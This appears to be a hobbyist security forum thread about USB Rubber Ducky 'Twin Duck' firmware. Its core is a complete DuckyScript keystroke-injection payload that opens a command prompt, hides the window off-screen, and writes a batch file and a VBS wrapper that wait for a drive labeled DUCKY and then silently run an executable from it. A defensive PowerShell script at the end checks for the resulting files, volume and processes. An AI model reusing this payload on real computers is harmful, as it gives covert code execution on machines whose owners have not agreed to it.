
Posted (edited)

Yes - Look at Twin Duck Firmware (c_duck_v2.hex), it can be executed straight from the HID payload.

There should be info in the forums; Overwraith has some demo code somewhere?

Edited by midnitesnake
Posted

Information on the PoC (before Xmas) is here: http://forums.hak5.org/index.php?/topic/28162-introducing-twin-duck-firmware/?p=214115

Now you can use DuckyScript to deliver a HID payload rather than the previous hard-coded executable.

You can use the following code to search for the drive via label:

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

then execute a binary on the ducky by:

%myd%/my_executable.exe

or

%myd%/my_batfile.bat

Other Info is on the website, in my signature.

Posted (edited)

The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnitesnake's code in this payload. I have been having some problems with delays, so I went a little overboard with the "DELAY 25" codes. The name of the file that is run can be changed to .exe; I am just having it run a batch for testing purposes. The line that says "STRING %myd%\myEXE.bat" is the line that executes the executable.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32".

REM Message.txt
echo Hello World!!!
echo Hello World!!! > Message.txt

P.S. When is the online payload generator getting back online!!! I need the REPEAT command!!!! You will need to replace REPEAT in the beginning of the code with 100 repeats, so copy-pasty.

Edited by overwraith
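For anyone who has to check a Windows box for what the two posts above describe (a volume labeled "DUCKY" found through the same data `wmic volume get driveletter, label` reads, and the DuckyWait.bat / invis.vbs / Message.txt files the payload drops into the directory cmd.exe started in), here is a PowerShell check. It is an added example, not code from either poster: the label, file names, the `wscript.exe invis.vbs` command line and the System32 location come from the thread; the function names and the user-profile fallback directory are my assumptions.

```powershell
# Added example (not from the thread). Defender-side checks for the technique
# discussed above. Function names and the USERPROFILE fallback are assumptions.

function Get-VolumesByLabel {
    param(
        [string]$Label = 'DUCKY'   # label the posts look for
    )
    # Win32_Volume is the class behind 'wmic volume'. The batch version uses
    # findstr "DUCKY", a case-sensitive substring match; -like "*DUCKY*" is the
    # same substring match but case-insensitive, so it catches slightly more.
    Get-CimInstance -ClassName Win32_Volume |
        Where-Object { $_.Label -like "*$Label*" } |
        Select-Object DriveLetter, Label, DriveType, FileSystem
    # DriveType 2 = removable disk, 3 = local disk (Win32 DriveType values).
}

function Find-DropperArtifacts {
    param(
        # The payload creates its files in whatever directory the Run-dialog
        # cmd.exe started in; the thread expects System32. USERPROFILE is an
        # assumed second place to look.
        [string[]]$Directories = @("$env:SystemRoot\System32", $env:USERPROFILE),
        [string[]]$Names = @('DuckyWait.bat', 'invis.vbs', 'Message.txt')
    )
    foreach ($dir in $Directories) {
        foreach ($name in $Names) {
            $path = Join-Path -Path $dir -ChildPath $name
            if (Test-Path -LiteralPath $path) {
                Get-Item -LiteralPath $path |
                    Select-Object FullName, Length, LastWriteTime
            }
        }
    }
}

function Find-InvisibleScriptHosts {
    # The payload launches 'wscript.exe invis.vbs DuckyWait.bat' so the batch
    # runs with no window. The command line of wscript.exe still shows it.
    Get-CimInstance -ClassName Win32_Process |
        Where-Object { $_.Name -ieq 'wscript.exe' -and $_.CommandLine -like '*invis.vbs*' } |
        Select-Object ProcessId, ParentProcessId, CommandLine
}

# Usage: run the three checks and print whatever they find.
'== Volumes whose label contains DUCKY =='
Get-VolumesByLabel
'== Dropped helper files =='
Find-DropperArtifacts
'== wscript.exe processes running invis.vbs =='
Find-InvisibleScriptHosts
```

Run it in an elevated PowerShell prompt so System32 and other users' processes are readable. Empty output from all three sections means none of the thread's artifacts are present; a hit in the third section gives you the parent process id, which on a live machine should lead back to the cmd.exe that the keystroke injection opened.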
